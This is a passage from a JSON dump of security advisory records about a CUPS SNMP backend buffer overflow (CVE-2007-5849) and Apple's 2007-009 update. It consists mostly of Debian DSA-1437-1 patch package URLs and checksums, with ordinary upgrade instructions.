target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_s390.deb</a>\r\nSize/MD5 checksum: 1035680 081c5ca040751dc4ec59d2a83289099c\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_s390.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_s390.deb</a>\r\nSize/MD5 checksum: 86854 5011337fee7f4dcfb62a6c95f7054e98\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_s390.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_s390.deb</a>\r\nSize/MD5 checksum: 37422 731fb2009fa3cf47e270c35348d2e3e4\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_s390.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_s390.deb</a>\r\nSize/MD5 checksum: 82338 4f93e2f975642addd238eecf78a94779\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_s390.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_s390.deb</a>\r\nSize/MD5 checksum: 165816 c69411004d08763f1b86a5d517592fc7\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_s390.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_s390.deb</a>\r\nSize/MD5 checksum: 144946 74bca185776b08ac50a9abcc17019e68\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_s390.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_s390.deb</a>\r\nSize/MD5 checksum: 52260 1324db10b3374beb81b98032ba92e2b8\r\n\r\nsparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_sparc.deb</a>\r\nSize/MD5 checksum: 51580 6052b09bd8c4cb9600156b24f185122a\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_sparc.deb</a>\r\nSize/MD5 checksum: 139570 2aa5b4d2d64849aa048489332f7e3aca\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_sparc.deb</a>\r\nSize/MD5 checksum: 1561428 59199c965cba64d0aaf9a2de6c3432b6\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_sparc.deb</a>\r\nSize/MD5 checksum: 84282 edec6a1d4af9df91f2d2b5c20553dbe9\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_sparc.deb</a>\r\nSize/MD5 checksum: 990474 e276a14d21a6d7661c91c3420c96e142\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_sparc.deb</a>\r\nSize/MD5 checksum: 158256 d43c9657a710bb5969e704208502f59f\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_sparc.deb</a>\r\nSize/MD5 checksum: 78514 32c106b3332c95dd0f24d6cf5d208add\r\n<a href=http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_sparc.deb target=_blank>http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_sparc.deb</a>\r\nSize/MD5 checksum: 36020 751c12e8f83f04b5fd54d4a23abdf6fc\r\n\r\n\u8865\u4e01\u5b89\u88c5\u65b9\u6cd5\uff1a\r\n\r\n1. \u624b\u5de5\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u4e0b\u8f7d\u8865\u4e01\u8f6f\u4ef6\uff1a\r\n # wget url (url\u662f\u8865\u4e01\u4e0b\u8f7d\u94fe\u63a5\u5730\u5740)\r\n\r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u6765\u5b89\u88c5\u8865\u4e01\uff1a \r\n # dpkg -i file.deb (file\u662f\u76f8\u5e94\u7684\u8865\u4e01\u540d)\r\n\r\n2. \u4f7f\u7528apt-get\u81ea\u52a8\u5b89\u88c5\u8865\u4e01\u5305\uff1a\r\n\r\n \u9996\u5148\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u66f4\u65b0\u5185\u90e8\u6570\u636e\u5e93\uff1a\r\n # apt-get update\r\n \r\n \u7136\u540e\uff0c\u4f7f\u7528\u4e0b\u9762\u7684\u547d\u4ee4\u5b89\u88c5\u66f4\u65b0\u8f6f\u4ef6\u5305\uff1a\r\n # apt-get upgrade\r\n\r\nGentoo\r\n------\r\nGentoo\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08GLSA-200712-14\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nGLSA-200712-14\uff1aCUPS: Multiple vulnerabilities\r\n\u94fe\u63a5\uff1a<a href=http://security.gentoo.org/glsa/glsa-200712-14.xml target=_blank>http://security.gentoo.org/glsa/glsa-200712-14.xml</a>\r\n\r\n\u6240\u6709CUPS\u7528\u6237\u90fd\u5e94\u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c\uff1a\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r4"", "published": "2008-01-04T00:00:00", "type": "seebug", "title": "CUPS SNMP\u540e\u7aefasn1_get_string()\u51fd\u6570\u8fdc\u7a0b\u6808\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5849"], "modified": "2008-01-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2766", "id": "SSV:2766", "sourceData": "\n http://www.cups.org/str.php?L2589\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-2766", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:51:06", "description": "CVE-2007-4708\r\nCVE-2007-4709\r\nCVE-2007-4710\r\nCVE-2007-5847\r\nCVE-2007-5848\r\nCVE-2007-5849\r\nCVE-2007-5850\r\nCVE-2007-5851\r\nCVE-2007-5853\r\nCVE-2007-5854\r\nCVE-2007-5855\r\nCVE-2007-5856\r\nCVE-2007-5857\r\nCVE-2007-5859\r\nCVE-2007-5876\r\nCVE-2007-5860\r\nCVE-2007-5861\r\n\r\nThese issues affect Mac OS X and various applications, including Address Book, CFNetwork, ColorSync, CoreFoundation, CUPS, Desktop Services, iChat, IO Storage Family, Launch Services, Mail, Quick Look, Safari, Safari RSS, SMB, Software Update, Spin Tracer, Spotlight, tcpdump, and XQuery.\r\n\r\nAttackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, and potentially compromise vulnerable computers.\r\n\r\nApple Mac OS X 10.5.1 and prior versions are vulnerable to these issues. \n\nrPath rPath Linux 1\r\nApple Mac OS X Server 10.5.1 \r\nApple Mac OS X Server 10.4.11 \r\nApple Mac OS X Server 10.4.10 \r\nApple Mac OS X Server 10.4.9 \r\nApple Mac OS X Server 10.4.8 \r\nApple Mac OS X Server 10.4.7 \r\nApple Mac OS X Server 10.4.6 \r\nApple Mac OS X Server 10.4.5 \r\nApple Mac OS X Server 10.4.4 \r\nApple Mac OS X Server 10.4.3 \r\nApple Mac OS X Server 10.4.2 \r\nApple Mac OS X Server 10.4.1 \r\nApple Mac OS X Server 10.4 \r\nApple Mac OS X Server 10.5\r\nApple Mac OS X 10.5.1 \r\nApple Mac OS X 10.4.11 \r\nApple Mac OS X 10.4.10 \r\nApple Mac OS X 10.4.9 \r\nApple Mac OS X 10.4.8 \r\nApple Mac OS X 10.4.7 \r\nApple Mac OS X 10.4.6 \r\nApple Mac OS X 10.4.5 \r\nApple Mac OS X 10.4.4 \r\nApple Mac OS X 10.4.3 \r\nApple Mac OS X 10.4.2 \r\nApple Mac OS X 10.4.1 \r\nApple Mac OS X 10.4 \r\nApple Mac OS X 10.5\r\n\n Apple Mac OS X Server 10.4.11 \r\n\r\nApple Security Update 2007-009 (10.4.11 PPC)\r\n<a href=http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16521&cat= target=_blank>http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16521&cat=</a> 1&platform=osx&method=sa/SecUpd2007-009Univ.dmg\r\n\r\nApple Security Update 2007-009 (10.4.11 Universal)\r\n<a href=http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16521&cat= target=_blank>http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16521&cat=</a> 1&platform=osx&method=sa/SecUpd2007-009Univ.dmg\r\n\r\n\r\nApple Mac OS X 10.4.11 \r\n\r\nApple Security Update 2007-009 (10.4.11 PPC)\r\n<a href=http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16521&cat= target=_blank>http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16521&cat=</a> 1&platform=osx&method=sa/SecUpd2007-009Univ.dmg\r\n\r\nApple Security Update 2007-009 (10.4.11 Universal)\r\n<a href=http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16521&cat= target=_blank>http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16521&cat=</a> 1&platform=osx&method=sa/SecUpd2007-009Univ.dmg\r\n\r\n\r\nApple Mac OS X Server 10.5.1 \r\n\r\nApple Security Update 2007-009 (10.5.1)\r\n<a href=http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16527&cat= target=_blank>http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16527&cat=</a> 1&platform=osx&method=sa/SecUpd2007-009.dmg\r\n\r\n\r\nApple Mac OS X 10.5.1 \r\n\r\nApple Security Update 2007-009 (10.5.1)\r\n<a href=http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16527&cat= target=_blank>http://wsidecar.apple.com/cgi-bin/nph-reg3rdpty2.pl/product=16527&cat=</a> 1&platform=osx&method=sa/SecUpd2007-009.dmg", "published": "2008-01-06T00:00:00", "type": "seebug", "title": "Apple Mac OS X v10.5.1 2007-009 Multiple Security Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-4708", "CVE-2007-4709", "CVE-2007-4710", "CVE-2007-5847", "CVE-2007-5848", "CVE-2007-5849", "CVE-2007-5850", "CVE-2007-5851", "CVE-2007-5853", "CVE-2007-5854", "CVE-2007-5855", "CVE-2007-5856", "CVE-2007-5857", "CVE-2007-5859", "CVE-2007-5860", "CVE-2007-5861", "CVE-2007-5876"], "modified": "2008-01-06T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2771", "id": "SSV:2771", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:NONE/"}}], "debian": [{"lastseen": "2020-11-11T13:16:51", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6358", "CVE-2007-5849"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1437-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nDecember 26, 2007 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : cupsys\nVulnerability : several\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2007-5849 CVE-2007-6358\n\nSeveral local vulnerabilities have been discovered in the Common UNIX\nPrinting System. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2007-5849\n\n Wei Wang discovered that an buffer overflow in the SNMP backend\n may lead to the execution of arbitrary code.\n\nCVE-2007-6358\n\n Elias Pipping discovered that insecure handling of a temporary\n file in the pdftops.pl script may lead to local denial of service.\n This vulnerability is not exploitable in the default configuration.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.2.7-4etch2.\n\nThe old stable distribution (sarge) is not affected by CVE-2007-5849.\nThe other issue doesn't warrant an update on it's own and has been\npostponed.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.3.5-1.\n\nWe recommend that you upgrade your cupsys packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian 4.0 (stable)\n- -------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2.dsc\n Size/MD5 checksum: 1084 7eda7d3797d141d174e163f837cd91b4\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz\n Size/MD5 checksum: 4214272 c9ba33356e5bb93efbcf77b6e142e498\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2.diff.gz\n Size/MD5 checksum: 103089 a856a1ff975042783cb87f23d15e5b3a\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch2_all.deb\n Size/MD5 checksum: 45246 3216cd80859aa97b7c8c5774b2462db2\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch2_all.deb\n Size/MD5 checksum: 893020 28b90e7e58400b9216f72cecf7de0d4a\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_alpha.deb\n Size/MD5 checksum: 1096542 686386cd43230708d49cea4af0d57b9f\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_alpha.deb\n Size/MD5 checksum: 94468 32d1efdef788039ac00ed1e57a6fcc47\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_alpha.deb\n Size/MD5 checksum: 1608840 d042363f0999e1f11939e3f5e8de8b38\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_alpha.deb\n Size/MD5 checksum: 72432 5e43d1208715258c4ff09dcee0fa4081\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_alpha.deb\n Size/MD5 checksum: 86284 dca9ccc53cb8fcf7b8e1a44b8e76a6ad\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_alpha.deb\n Size/MD5 checksum: 184372 cb6c4f2c2a08ccc55c25c35d039fe400\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_alpha.deb\n Size/MD5 checksum: 39260 cdfc7a39f71c1aed6973a2956cf8749d\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_alpha.deb\n Size/MD5 checksum: 174608 e2c1ebf86bfc9f538a640c8ea385330f\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_amd64.deb\n Size/MD5 checksum: 142552 60167bc344afbaa54904b295c78def9c\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_amd64.deb\n Size/MD5 checksum: 36366 3feca5f614aca7d527b1beba01462f6e\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_amd64.deb\n Size/MD5 checksum: 161666 65ebf0f70d842eeb8adc309946357b4d\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_amd64.deb\n Size/MD5 checksum: 85314 0be1f821b4880c7a4b83cd7779edbce4\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_amd64.deb\n Size/MD5 checksum: 80704 26db3ea2f4aee728ead9ffba2686b827\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_amd64.deb\n Size/MD5 checksum: 1574360 3a1e7f5f6a8766a1f89aa65fc47c5d72\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_amd64.deb\n Size/MD5 checksum: 52862 3e8caecdc231fcded29f0029b76019a8\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_amd64.deb\n Size/MD5 checksum: 1085694 235f96f3c07947ab11cd4222490441f0\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_arm.deb\n Size/MD5 checksum: 48532 08ce8a9c2d9edf30a381ddc34073c397\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_arm.deb\n Size/MD5 checksum: 1025036 c3165815ab4292c0b200176c4c0ad7d6\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_arm.deb\n Size/MD5 checksum: 35924 02c6ebde8deb0fcb39074deb5895b95b\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_arm.deb\n Size/MD5 checksum: 78912 33627a4c4e1dd3b4001f165cfda64259\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_arm.deb\n Size/MD5 checksum: 132054 c4e04d8fb763e599931f3cb0207d84cb\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_arm.deb\n Size/MD5 checksum: 154314 0dcbd01293a5a0925af776bc0d6490fa\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_arm.deb\n Size/MD5 checksum: 84494 66ff0b8a8b07d0faddee758806e044be\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_arm.deb\n Size/MD5 checksum: 1568356 725c88c2ac3737a0a323e82a5877f8f9\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_hppa.deb\n Size/MD5 checksum: 39264 528456372ac16c6dc257d2672a24cc84\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_hppa.deb\n Size/MD5 checksum: 85260 60da86a4e6b72d49f3c405cda6eaaa33\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_hppa.deb\n Size/MD5 checksum: 90316 7d7093a9bca7c6ee4a190eaea715cf1f\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_hppa.deb\n Size/MD5 checksum: 57026 7e78c5bf532b9761b6ebc290c4c24b94\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_hppa.deb\n Size/MD5 checksum: 171548 37bfd1849d459be20f5df6da4d0e8f19\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_hppa.deb\n Size/MD5 checksum: 1611932 3a3e91d8c878c6ec42a99d1bfacbafac\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_hppa.deb\n Size/MD5 checksum: 154600 fc87ba725d54223245d9cb71777307a7\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_hppa.deb\n Size/MD5 checksum: 1031728 cdcfb63a3a2200f4ca36aa0d530c32d9\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_i386.deb\n Size/MD5 checksum: 53068 e28d98e95a5e543991b996e84d028863\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_i386.deb\n Size/MD5 checksum: 138280 28df76637f6b23d98ec81f6a7bf2b6ba\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_i386.deb\n Size/MD5 checksum: 159796 fa2db05d879ce293041be45683febe8b\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_i386.deb\n Size/MD5 checksum: 1547840 6d7396410919ae7207d3d9aadfb5026f\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_i386.deb\n Size/MD5 checksum: 79880 c392020f91e2901d4122ef6a1fa08fed\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_i386.deb\n Size/MD5 checksum: 85778 a11291b1a834d42ba160fb8d92db0c3a\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_i386.deb\n Size/MD5 checksum: 997490 0d91574ed291678037351dd0a32f445f\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_i386.deb\n Size/MD5 checksum: 36476 ee84ce1774c646915ba410dadcda3470\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_ia64.deb\n Size/MD5 checksum: 1107194 dc683bec9dcfffc4a1e020b2859e1fab\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_ia64.deb\n Size/MD5 checksum: 106228 db41cfc57bf2d43da703285f9790344c\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_ia64.deb\n Size/MD5 checksum: 46332 f52d7a07c6acf6613da1ae43f64b8ef7\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_ia64.deb\n Size/MD5 checksum: 203378 9da06426a99702d4485b528d542b666d\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_ia64.deb\n Size/MD5 checksum: 105872 cd243300f6b804b2501e5681401c574e\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_ia64.deb\n Size/MD5 checksum: 73934 b3618bd2d5b1de8371ea56301312ef3a\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_ia64.deb\n Size/MD5 checksum: 192368 35aba3be08e6a72b54617bb666b12d4c\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_ia64.deb\n Size/MD5 checksum: 1769808 8d0ab1028149cabd9d946c44cf4d4f86\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_mips.deb\n Size/MD5 checksum: 77158 5302b4e5edb3d0d7733481eaabdbddcf\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_mips.deb\n Size/MD5 checksum: 85874 d6beacabf8db05137b4c4357ea7557e9\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_mips.deb\n Size/MD5 checksum: 157884 d0f4ed5d1da24041179f9f2697f2ffcb\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_mips.deb\n Size/MD5 checksum: 1096124 feea35b2ae01af3b06ee3ce8a854324e\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_mips.deb\n Size/MD5 checksum: 35968 0bb0b6c1018c466326b6406de4af093e\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_mips.deb\n Size/MD5 checksum: 150766 ff55f24b0b36722265644252857d8b5c\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_mips.deb\n Size/MD5 checksum: 1550792 97167182293fc8400cb9fefffc3670e7\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_mips.deb\n Size/MD5 checksum: 57384 b2473f40bde45105c0bdec916ff93cdb\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_mipsel.deb\n Size/MD5 checksum: 86054 f78f586a8f15727e28c67bca58caaa26\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_mipsel.deb\n Size/MD5 checksum: 1552410 94190014545b85b403a21e97d9901776\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_mipsel.deb\n Size/MD5 checksum: 157716 e0bd0f1e90b1124b1441bc1f313a7764\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_mipsel.deb\n Size/MD5 checksum: 1083814 a5968478d72e11f19d4e019d3095e51f\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_mipsel.deb\n Size/MD5 checksum: 36068 363ff5b0694c2fef407a92dea1ba1c4e\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_mipsel.deb\n Size/MD5 checksum: 77458 db7144590602bf3cf25cba5fdce485a8\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_mipsel.deb\n Size/MD5 checksum: 57700 04626a4cb44728ea61bcb7f8d8ddc1ed\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_mipsel.deb\n Size/MD5 checksum: 150902 f3cb4f6ca36503d7b70aab6d559199d2\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_powerpc.deb\n Size/MD5 checksum: 51792 e89680c8a9b4851ebb5ad0d304e6bbb7\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_powerpc.deb\n Size/MD5 checksum: 90002 ce367709844a87951f810524aadfea4c\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_powerpc.deb\n Size/MD5 checksum: 136864 0aabc007ab84b86a77f6c601ba8d44fd\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_powerpc.deb\n Size/MD5 checksum: 87576 f18bba76c873a6238e78a80182c0cd38\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_powerpc.deb\n Size/MD5 checksum: 1575144 506c85d9a8b03be737ccb8dd3fd31248\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_powerpc.deb\n Size/MD5 checksum: 1141712 b6ab866de7c8c6f2051c2a813003a722\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_powerpc.deb\n Size/MD5 checksum: 162358 08096969b7e8ef48d2ece9a86600004a\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_powerpc.deb\n Size/MD5 checksum: 41290 b7eb0528a3b1b8bd07247fd9e16b76c2\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch2_s390.deb\n Size/MD5 checksum: 1586292 01001ec68f5ff6a090ebff3099265be0\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch2_s390.deb\n Size/MD5 checksum: 1035680 081c5ca040751dc4ec59d2a83289099c\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch2_s390.deb\n Size/MD5 checksum: 86854 5011337fee7f4dcfb62a6c95f7054e98\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch2_s390.deb\n Size/MD5 checksum: 37422 731fb2009fa3cf47e270c35348d2e3e4\n http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch2_s390.deb\n Size/MD5 checksum: 82338 4f93e2f975642addd238eecf78a94779\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch2_s390.deb\n Size/MD5 checksum: 165816 c69411004d08763f1b86a5d517592fc7\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch2_s390.deb\n Size/MD5 checksum: 144946 74bca185776b08ac50a9abcc17019e68\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_s390.deb\n Size/MD5 checksum: 52260 1324db10b3374beb81b98032ba92e2b8\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch2_sparc.deb\n Size/MD5 checksum: 51580 